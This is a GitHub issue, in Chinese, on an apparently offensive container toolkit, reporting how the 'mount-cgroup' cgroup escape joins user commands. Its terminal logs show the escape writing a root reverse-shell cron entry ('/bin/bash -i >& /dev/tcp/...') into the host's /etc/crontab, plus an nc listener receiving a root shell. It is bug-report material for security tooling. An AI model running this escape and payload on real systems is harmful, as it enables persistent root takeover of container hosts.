
mount-cgroup执行命令时的拼接问题处置

Open F14Sec opened this issue 2 years ago • 1 comments

root@79a270635491:/# ./cdk run mount-cgroup "echo \"* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'\" >> /etc/crontab"
2023/10/17 04:25:59 current cgroup for exploit: memory 
2023/10/17 04:25:59 user-defined shell payload is: echo "* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'" >> /etc/crontab 
2023/10/17 04:25:59 Found hostpath: /var/lib/docker/overlay2/37263eea1b159b6a86395fe44a9ede856a2f8c055f309244d2d16d7619f2541d/diff
2023/10/17 04:25:59 generate shell exploit with user-input cmd: 

echo "* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'" >> /etc/crontab

final shell exploit is: 

#!/bin/sh
echo "* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'" >> /etc/crontab > /var/lib/docker/overlay2/37263eea1b159b6a86395fe44a9ede856a2f8c055f309244d2d16d7619f2541d/diff/cdk_cgres_St8G

2023/10/17 04:25:59 shell script saved to /cdk_cgexp_St8G.sh
2023/10/17 04:26:04 Execute Result: 

 * * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'
 
root@79a270635491:/#
root@79a270635491:/# 
root@79a270635491:/# 
root@79a270635491:/# ./cdk run mount-cgroup "echo \"* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'\" >> /etc/crontab; echo hello"
2023/10/17 04:28:43 current cgroup for exploit: memory 
2023/10/17 04:28:43 user-defined shell payload is: echo "* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'" >> /etc/crontab; echo hello 
2023/10/17 04:28:43 Found hostpath: /var/lib/docker/overlay2/37263eea1b159b6a86395fe44a9ede856a2f8c055f309244d2d16d7619f2541d/diff
2023/10/17 04:28:43 generate shell exploit with user-input cmd: 

echo "* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'" >> /etc/crontab; echo hello

final shell exploit is: 

#!/bin/sh
echo "* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'" >> /etc/crontab; echo hello > /var/lib/docker/overlay2/37263eea1b159b6a86395fe44a9ede856a2f8c055f309244d2d16d7619f2541d/diff/cdk_cgres_ieFr

2023/10/17 04:28:43 shell script saved to /cdk_cgexp_ieFr.sh
2023/10/17 04:28:48 Execute Result: 

 hello
 
root@79a270635491:/#
ubuntu@VM-0-2-ubuntu:~$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
# You can also override PATH, but by default, newer versions inherit it from the environment
#PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'
ubuntu@VM-0-2-ubuntu:~$ 
ubuntu@VM-0-2-ubuntu:~$ nc -lvnp 22334
Listening on 0.0.0.0 22334
Connection received on 127.0.0.1 43058
bash: cannot set terminal process group (29740): Inappropriate ioctl for device
bash: no job control in this shell
root@VM-0-2-ubuntu:~#

F14Sec avatar Oct 17 '23 04:10 F14Sec

“拼接问题”指的是什么问题呢?

neargle avatar Nov 08 '23 04:11 neargle